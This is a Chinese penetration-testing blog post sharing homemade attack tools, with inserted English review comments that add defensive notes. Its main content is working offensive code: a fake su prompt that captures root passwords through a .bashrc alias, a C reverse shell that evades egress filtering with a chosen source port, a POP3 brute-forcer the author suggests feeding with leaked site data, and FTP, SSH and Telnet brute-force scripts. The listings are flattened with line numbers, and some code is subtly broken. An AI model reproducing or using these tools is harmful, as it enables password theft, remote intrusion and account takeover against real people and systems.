0x00
渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小实用,求欣赏,求好评。
0x01
记录root密码小工具
root.py
# Review note (documentation only; code left exactly as rendered): this listing
# is printed on a single line with the page's gutter numbers and "//"
# annotations fused into it, so it is a transcript rather than a runnable file.
# What the visible code does, in transcript order: records the current time,
# sets logfile to /dev/shm/.su.log, shows a "Password: " prompt through
# getpass, appends the entered text and the timestamp to that file, silences
# any exception with a bare except/pass, sleeps one second and then prints a
# distribution-specific su failure string (CentOS/Ubuntu variants are kept as
# comments). The real su is never executed. The surrounding page text pairs it
# with a shell alias for su in a low-privilege user's .bashrc, i.e. a
# credential-capture wrapper. Python 2 print syntax.
# Defensive relevance: audit shell rc files for aliases or functions that
# shadow su/sudo, monitor creation of hidden files under /dev/shm, and treat an
# apparent su failure that leaves no corresponding authentication log entry as
# suspicious, since nothing here calls su or PAM.
1 #!/usr/bin/python 2 import os, sys, getpass, time 3 4 current_time = time.strftime("%Y-%m-%d %H:%M") 5 logfile="/dev/shm/.su.log" //密码获取后记录在这里 6 #CentOS 7 #fail_str = "su: incorrect password" 8 #Ubuntu 9 #fail_str = "su: Authentication failure" 10 #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样 11 fail_str = "su: incorrect password" 12 try: 13 passwd = getpass.getpass(prompt='Password: '); 14 file=open(logfile,'a') 15 file.write("[%s]t%s"%(passwd, current_time)) //截取root密码 16 file.write('n') 17 file.close() 18 except: 19 pass 20 time.sleep(1) 21 print fail_str //打印切换root失败提示
渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py'; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
0x02
设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,
Ping了下百度 可以ping通,
那真相只有一个
服务器变态地限制了只能以某些端口为源端口去连接外面
比如
只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
/* Review note (documentation only; code left exactly as rendered): the listing
 * is printed on a single line with the page's gutter numbers fused in, so it
 * is a transcript rather than a compilable file.
 * What the visible code does: error() prints a perror message and exits;
 * main() expects a hostname, a remote port and a local port, opens an
 * AF_INET/SOCK_STREAM socket, binds it to INADDR_ANY on the local port taken
 * from argv[3] (the chosen source port), resolves argv[1] with gethostbyname,
 * connects to the port in argv[2], duplicates a descriptor onto fds 0, 1 and
 * 2, and execl()s /bin/sh with "sh -i" as its argv[0], so the shell's stdio
 * rides the TCP connection.
 * Defensive relevance: this exists to pass an egress filter that keys only on
 * the source port (the page's premise: traffic leaving from port 80 is
 * allowed out). Source-port allow-lists are therefore weak on their own;
 * stateful egress rules tied to the serving process, or default-deny egress,
 * close the gap. Detection points: an outbound TCP connection whose local
 * port is a service port (e.g. 80) but whose owning process is not that
 * service, and a /bin/sh whose stdio descriptors are a socket. On a default
 * Linux configuration binding a local port below 1024 requires root or
 * CAP_NET_BIND_SERVICE, so the "80 80" example in the usage text presupposes
 * that privilege.
 */
1 #include <stdio.h> 2 #include <sys/types.h> 3 #include <sys/socket.h> 4 #include <netinet/in.h> 5 #include <netdb.h> 6 void error(char *msg) 7 { 8 perror(msg); 9 exit(0); 10 } 11 int main(int argc, char *argv[]) 12 { 13 int sockfd, portno, lportno,n; 14 struct sockaddr_in serv_addr; 15 struct sockaddr_in client_addr; 16 struct hostent *server; 17 char buffer[256]; 18 if (argc < 3) { 19 fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]); 20 exit(0); 21 } //三个参数,目标主机,目标主机端口,本地源端口 22 portno = atoi(argv[2]); 23 sockfd = socket(AF_INET, SOCK_STREAM, 0); 24 if (sockfd < 0) 25 error("ERROR opening socket"); 26 27 28 bzero((char *) &client_addr, sizeof(client_addr)); 29 lportno = atoi(argv[3]); 30 client_addr.sin_family = AF_INET; 31 client_addr.sin_addr.s_addr = INADDR_ANY; 32 client_addr.sin_port = htons(lportno); //设置源端口 33 if (bind(sockfd, (struct sockaddr *) &client_addr, 34 sizeof(client_addr)) < 0) 35 error("ERROR on binding"); 36 37 server = gethostbyname(argv[1]); 38 if (server == NULL) { 39 fprintf(stderr,"ERROR, no such host "); 40 exit(0); 41 } 42 bzero((char *) &serv_addr, sizeof(serv_addr)); 43 serv_addr.sin_family = AF_INET; 44 bcopy((char *)server->h_addr, 45 (char *)&serv_addr.sin_addr.s_addr, 46 server->h_length); 47 serv_addr.sin_port = htons(portno); 48 if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接 49 error("ERROR connecting"); 50 dup2(fd, 0); 51 dup2(fd, 1); 52 dup2(fd, 2); 53 execl("/bin/sh","sh -i", NULL); //执行shell 54 close(fd); 55 }
用法:
1 gcc client-port.c -o port
1 chmod +x port
1 ./port 你的IP 你的监听端口 本地的源端口
如 ./port http://www.91ri.org 80 80
成功反弹shell 提权成功
0x03 邮箱爆破脚本
某个时候 需要爆破一批邮箱
Burp163.pl
# Review note (documentation only; code left exactly as rendered): printed on
# a single line with gutter numbers and "//" annotations fused in; a transcript,
# not a runnable script.
# What the visible code does: sets $email to pop.163.com, opens one Net::POP3
# session just to print the server banner, reads user.txt and pass.txt into
# arrays, appends "@163.com" to every username, and for each username/password
# pair opens a fresh Net::POP3 session, calls login(), prints "success" or
# "failed", quits, and finally prints the attempt counter $i.
# Defensive relevance: online credential testing against a POP3 service, one
# new TCP session per guess with no delay or backoff. Mail-side signals: many
# short POP3 sessions from one source, each ending in a single login attempt,
# spread across many accounts. The page's stated use (replaying credentials
# taken from another site's data) is exactly the case per-account lockouts
# miss; per-source connection rate limits and MFA on mail access cover it,
# and for users, not reusing a password between sites.
1 #!/usr/bin/perl 2 use Net::POP3; 3 $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com 4 $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); 5 print $pop->banner(); 6 $pop->quit; 7 $i=0; 8 open(fp1,"user.txt"); 9 @array1=<fp1>; 10 open(fp2,"pass.txt"); 11 @array2=<fp2>; //从文件中获取邮箱用户名及密码 12 foreach $a(@array1) { 13 $u=substr($a,0,length($a)-1); 14 $u=$u."@163.com"; 15 foreach $b(@array2) { 16 $p=substr($b,0,length($b)-1); 17 print "cracked with ".$u."-----".$p."n"; 18 $i=$i+1; 19 $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. "); 20 $m=$pop->login($u,$p); //尝试登录邮箱 21 if($m>0) 22 { 23 print $u."------------".$p."----"."success"."n"; 24 $pop->quit; 25 } //成功登录 26 else 27 { 28 print $u."------------".$p."----"."failed"."n"; 29 $pop->quit; //登录失败 30 } 31 } 32 } 33 print $i;
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
1 $email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说
这个有点鸡肋吧 万一邮箱的密码很复杂
呵呵
搞到了一个小站的数据,
用这个程序批量测试密码是否就是邮箱密码 呵呵
我啥都没说。
0x04
这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。
在渗透测试当中,免不了要进行密码破解。http://www.91ri.org/8696.html
0x01
FTP暴力破解脚本
# Review note (documentation only; code left exactly as rendered): this listing
# is spread over three physical lines of the page with gutter numbers fused in
# and several statements collapsed together; it is a transcript, not a
# runnable file. Python 2 syntax (print statements, `except Exception, e`).
# Module layout as visible: clears the terminal with os.system, defines ANSI
# colour constants R/G/Y/END, then
#   logo()       - prints the banner and the docs string;
#   help()       - prints option help and calls sys.exit(1);
#   bf_login(hostname, username, password)
#                - opens an ftplib.FTP connection, calls login() and
#                  retrlines('list'), prints the credentials on success and
#                  returns 1; any Exception is swallowed with pass;
#   anon_login(hostname)
#                - calls FTP.login() with no arguments and prints whether
#                  anonymous login worked;
#   main()       - walks sys.argv by hand for -t/-u/-p/-h, reads the username
#                  and password files, then tries every pair in sequence.
# Defensive relevance: FTP password guessing preceded by an anonymous-login
# probe, single-threaded, one connection per guess. Mitigations that follow
# from this behaviour: disable anonymous FTP unless it is intended, apply
# per-source connection limits and failed-login lockout on the FTP service,
# and prefer SFTP/FTPS since FTP credentials cross the wire in clear text.
# Server-side signal: bursts of 530 (login incorrect) responses to one client.
1 #!/usr/bin/env python 2 #-*-coding = utf-8-*- 3 #author:@xfk 4 #blog:@blog.sina.com.cn/kaiyongdeng 5 #date:@2012-05-08 6 7 import sys, os, time 8 from ftplib import FTP 9 docs = """ 10 [*] This was written for educational purpose and pentest only. Use it at your own risk. 11 [*] Author will be not responsible for any damage! 12 [*] Toolname : ftp_bf.py 13 [*] Coder : 14 [*] Version : 0.1 15 [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt 16 """ 17 18 if sys.platform == 'linux' or sys.platform == 'linux2': 19 clearing = 'clear' 20 else: 21 clearing = 'cls' 22 os.system(clearing) 23 R = "\033[31m"; 24 G = "\033[32m"; 25 Y = "\033[33m" 26 END = "\033[0m" 27 def logo(): 28 print G+"\n |---------------------------------------------------------------|" 29 print " | |" 30 print " | blog.sina.com.cn/kaiyongdeng |" 31 print " | 08/05/2012 ftp_bf.py v.0.1 |" 32 print " | FTP Brute Forcing Tool |" 33 print " | |" 34 print " |---------------------------------------------------------------|\n" 35 print " \n [-] %s\n" % time.strftime("%X") 36 print docs+END 37 38 def help(): 39 print R+"[*]-t, --target ip/hostname <> Our target" 40 print "[*]-u, --usernamelist usernamelist <> usernamelist path" 41 print "[*]-p, --passwordlist passwordlist <> passwordlist path" 42 print "[*]-h, --help help <> print this help" 43 print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1) 44 45 def bf_login(hostname,username,password): 46 # sys.stdout.write("\r[!]Checking : %s " % (p)) 47 # sys.stdout.flush() 48 try: 49 ftp = FTP(hostname) 50 ftp.login(hostname,username, password) 51 ftp.retrlines('list') 52 ftp.quit() 53 print Y+"\n[!] w00t,w00t!!! We did it ! 
" 54 print "[+] Target : ",hostname, "" 55 print "[+] User : ",username, "" 56 print "[+] Password : ",password, ""+END 57 return 1 58 # sys.exit(1) 59 except Exception, e: 60 pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END 61 sys.exit(1) 62 63 def anon_login(hostname): 64 try: 65 print G+"\n[!] Checking for anonymous login.\n"+END 66 ftp = FTP(hostname) ftp.login() 67 ftp.retrlines('LIST') 68 print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END 69 ftp.quit() 70 except Exception, e: 71 print R+"\n[-] Anonymous login failed...\n"+END 72 pass 73 74 def main(): 75 logo() 76 try: 77 for arg in sys.argv: 78 if arg.lower() == '-t' or arg.lower() == '--target': 79 hostname = sys.argv[int(sys.argv[1:].index(arg))+2] 80 elif arg.lower() == '-u' or arg.lower() == '--usernamelist': 81 usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2] 82 elif arg.lower() == '-p' or arg.lower() == '--passwordlist': 83 passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2] 84 elif arg.lower() == '-h' or arg.lower() == '--help': 85 help() 86 elif len(sys.argv) <= 1: 87 help() 88 except: 89 print R+"[-]Cheak your parametars input\n"+END 90 help() 91 92 print G+"[!] 
BruteForcing target ..."+END 93 anon_login(hostname) 94 # print "here is ok" 95 # print hostname 96 try: 97 usernames = open(usernamelist, "r") 98 user = usernames.readlines() 99 count1 = 0 100 while count1 < len(user): 101 user[count1] = user[count1].strip() 102 count1 +=1 103 except: 104 print R+"\n[-] Cheak your usernamelist path\n"+END 105 sys.exit(1) 106 107 # print "here is ok ",usernamelist,passwordlist 108 try: 109 passwords = open(passwordlist, "r") 110 pwd = passwords.readlines() 111 count2 = 0 112 while count2 < len(pwd): 113 pwd[count2] = pwd[count2].strip() 114 count2 +=1 115 except: 116 print R+"\n[-] Check your passwordlist path\n"+END 117 sys.exit(1) 118 119 print G+"\n[+] Loaded:",len(user),"usernames" 120 print "\n[+] Loaded:",len(pwd),"passwords" 121 print "[+] Target:",hostname 122 print "[+] Guessing...\n"+END 123 for u in user: for p in pwd: 124 result = bf_login(hostname,u.replace("\n",""),p.replace("\n","")) 125 if result != 1: 126 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END 127 else: 128 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END 129 if not result : 130 print R+"\n[-]There is no username ans password enabled in the list." 131 print "[-]Exiting...\n"+END 132 133 if __name__ == "__main__": 134 main()
0x02
SSH暴力破解
# Review note (documentation only; code left exactly as rendered): this listing
# is spread over three physical lines of the page with gutter numbers fused in;
# a transcript, not a runnable file. Python 2 syntax (print statements,
# `except Exception, e`).
# Module layout as visible: imports paramiko's SSHClient/AutoAddPolicy (prints
# install hints and exits if the import fails), clears the terminal, defines
# ANSI colour constants R/G/Y/END, then
#   logo()       - prints the banner and the docs string;
#   help()       - prints option help and calls sys.exit(1);
#   BruteForce(hostname, port, username, password)
#                - SSHClient with AutoAddPolicy (the server host key is never
#                  verified), connect() with the password, allow_agent=False,
#                  look_for_keys=False, timeout=None; returns 'ok' when the
#                  connection succeeds and 'error' on any Exception;
#   makelist(file)
#                - reads a file into a list of lines with \n and \r removed;
#   main()       - parses -t/-p/-u/-w/-h from sys.argv by hand, builds the two
#                  lists and tries every username/password pair in sequence.
# Defensive relevance: online SSH password guessing, one full SSH handshake per
# attempt. Mitigations: PasswordAuthentication no (key-based auth only), a low
# MaxAuthTries plus a lockout/ban mechanism on repeated failures, and alerting
# on bursts of failed password attempts for many usernames from one source.
# AutoAddPolicy on the client side also means any host presenting any key is
# accepted, so the tool itself is trivially interceptable by a MITM host.
1 #!/usr/bin/env python 2 #-*-coding = UTF-8-*- 3 #author@:dengyongkai 4 #blog@:blog.sina.com.cn/kaiyongdeng 5 6 7 import sys 8 import os 9 import time 10 #from threading import Thread 11 12 try: 13 from paramiko import SSHClient 14 from paramiko import AutoAddPolicy 15 except ImportError: 16 print G+''' 17 You need paramiko module. 18 http://www.lag.net/paramiko/ 19 Debian/Ubuntu: sudo apt-get install aptitude 20 : sudo aptitude install python-paramiko\n'''+END 21 sys.exit(1) 22 23 docs = """ 24 [*] This was written for educational purpose and pentest only. Use it at your own risk. 25 [*] Author will be not responsible for any damage! 26 [*] Toolname : ssh_bf.py 27 [*] Author : xfk 28 [*] Version : v.0.2 29 [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] 30 """ 31 32 33 if sys.platform == 'linux' or sys.platform == 'linux2': 34 clearing = 'clear' 35 else: 36 clearing = 'cls' 37 os.system(clearing) 38 39 40 R = "\033[31m"; 41 G = "\033[32m"; 42 Y = "\033[33m" 43 END = "\033[0m" 44 45 46 def logo(): 47 print G+"\n |---------------------------------------------------------------|" 48 print " | |" 49 print " | blog.sina.com.cn/kaiyongdeng |" 50 print " | 16/05/2012 ssh_bf.py v.0.2 |" 51 print " | SSH Brute Forcing Tool |" 52 print " | |" 53 print " |---------------------------------------------------------------|\n" 54 print " \n [-] %s\n" % time.ctime() 55 print docs+END 56 57 58 def help(): 59 print Y+" [*]-H --hostname/ip <>the target hostname or ip address" 60 print " [*]-P --port <>the ssh service port(default is 22)" 61 print " [*]-U --usernamelist <>usernames list file" 62 print " [*]-P --passwordlist <>passwords list file" 63 print " [*]-H --help <>show help information" 64 print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END 65 sys.exit(1) 66 67 def BruteForce(hostname,port,username,password): 68 ''' 69 Create SSH connection to target 70 ''' 71 ssh = SSHClient() 72 
ssh.set_missing_host_key_policy(AutoAddPolicy()) 73 try: 74 ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) 75 status = 'ok' 76 ssh.close() 77 except Exception, e: 78 status = 'error' 79 pass 80 return status 81 82 83 def makelist(file): 84 ''' 85 Make usernames and passwords lists 86 ''' 87 items = [] 88 89 try: 90 fd = open(file, 'r') 91 except IOError: 92 print R+'unable to read file \'%s\'' % file+END 93 pass 94 95 except Exception, e: 96 print R+'unknown error'+END 97 pass 98 99 for line in fd.readlines(): 100 item = line.replace('\n', '').replace('\r', '') 101 items.append(item) 102 fd.close() 103 return items 104 105 def main(): 106 logo() 107 # print "hello wold" 108 try: 109 for arg in sys.argv: 110 if arg.lower() == '-t' or arg.lower() == '--target': 111 hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2]) 112 if arg.lower() == '-p' or arg.lower() == '--port': 113 port = sys.argv[int(sys.argv[1:].index(arg))+2] 114 elif arg.lower() == '-u' or arg.lower() == '--userlist': 115 userlist = sys.argv[int(sys.argv[1:].index(arg))+2] 116 elif arg.lower() == '-w' or arg.lower() == '--wordlist': 117 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] 118 elif arg.lower() == '-h' or arg.lower() == '--help': 119 help() 120 elif len(sys.argv) <= 1: 121 help() 122 except: 123 print R+"[-]Cheak your parametars input\n"+END 124 help() 125 print G+"\n[!] BruteForcing target ...\n"+END 126 # print "here is ok" 127 # print hostname,port,wordlist,userlist 128 usernamelist = makelist(userlist) 129 passwordlist = makelist(wordlist) 130 131 print Y+"[*] SSH Brute Force Praparing." 132 print "[*] %s user(s) loaded." % str(len(usernamelist)) 133 print "[*] %s password(s) loaded." % str(len(passwordlist)) 134 print "[*] Brute Force Is Starting......."+END 135 try: 136 for username in usernamelist: 137 for password in passwordlist: 138 print G+"\n[+]Attempt uaername:%s password:%s..." 
% (username,password)+END 139 current = BruteForce(hostname, port, username, password) 140 if current == 'error': 141 print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END 142 # pass 143 else: 144 print G+"\n[+] ^-^ HaHa,We Got It!!!" 145 print "[+] username: %s" % username 146 print "[+] password: %s\n" % password+END 147 # sys.exit(0) 148 except: 149 print R+"\n[-] There Is Something Wrong,Pleace Cheak It." 150 print "[-] Exitting.....\n"+END 151 raise 152 print Y+"[+] Done.^-^\n"+END 153 sys.exit(0) 154 155 156 if __name__ == "__main__": 157 main()
0x03
TELNET密码暴力破解
# Review note (documentation only; code left exactly as rendered): printed on
# a single line with gutter numbers fused in; a transcript, not a runnable
# file. Python 2 print syntax.
# What the visible code does: requires <server> <userlist> <wordlist>, reads
# both files, keeps a copy of the word list; getword() removes a random word
# from the shared list and, when the list is exhausted, refills it from the
# copy and drops the first user (users are consumed in order); Worker.run()
# opens a telnetlib.Telnet session to the server, waits for "login: " and
# "Password: ", sends the pair, sends "ls" and "exit", prints whatever comes
# back, prints a "Login successful" line whenever no exception occurred, and
# then calls sys.exit(2); every exception is swallowed. The top-level loop
# starts one Worker thread per user/word combination with a one-second gap.
# Defensive relevance: online Telnet password guessing with many concurrent
# sessions. Telnet carries credentials in clear text; the mitigation is to
# disable the service in favour of SSH and, where it must stay, rate-limit and
# alert on many short sessions from one source that end at the password
# prompt.
1 #!usr/bin/python 2 #Telnet Brute Forcer 3 #http://www.darkc0de.com 4 #d3hydr8[at]gmail[dot]com 5 6 import threading, time, random, sys, telnetlib 7 from copy import copy 8 9 if len(sys.argv) !=4: 10 print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>" 11 sys.exit(1) 12 13 try: 14 users = open(sys.argv[2], "r").readlines() 15 except(IOError): 16 print "Error: Check your userlist path\n" 17 sys.exit(1) 18 19 try: 20 words = open(sys.argv[3], "r").readlines() 21 except(IOError): 22 print "Error: Check your wordlist path\n" 23 sys.exit(1) 24 25 print "\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0" 26 print "\t--------------------------------------------------\n" 27 print "[+] Server:",sys.argv[1] 28 print "[+] Users Loaded:",len(users) 29 print "[+] Words Loaded:",len(words),"\n" 30 31 wordlist = copy(words) 32 33 def reloader(): 34 for word in wordlist: 35 words.append(word) 36 37 def getword(): 38 lock = threading.Lock() 39 lock.acquire() 40 if len(words) != 0: 41 value = random.sample(words, 1) 42 words.remove(value[0]) 43 44 else: 45 print "\nReloading Wordlist - Changing User\n" 46 reloader() 47 value = random.sample(words, 1) 48 users.remove(users[0]) 49 50 lock.release() 51 if len(users) ==1: 52 return value[0][:-1], users[0] 53 else: 54 return value[0][:-1], users[0][:-1] 55 56 class Worker(threading.Thread): 57 58 def run(self): 59 value, user = getword() 60 try: 61 print "-"*12 62 print "User:",user,"Password:",value 63 tn = telnetlib.Telnet(sys.argv[1]) 64 tn.read_until("login: ") 65 tn.write(user + "\n") 66 if password: 67 tn.read_until("Password: ") 68 tn.write(value + "\n") 69 tn.write("ls\n") 70 tn.write("exit\n") 71 print tn.read_all() 72 print "\t\nLogin successful:",value, user 73 tn.close() 74 work.join() 75 sys.exit(2) 76 except: 77 pass 78 79 for I in range(len(words)*len(users)): 80 work = Worker() 81 work.start() 82 time.sleep(1)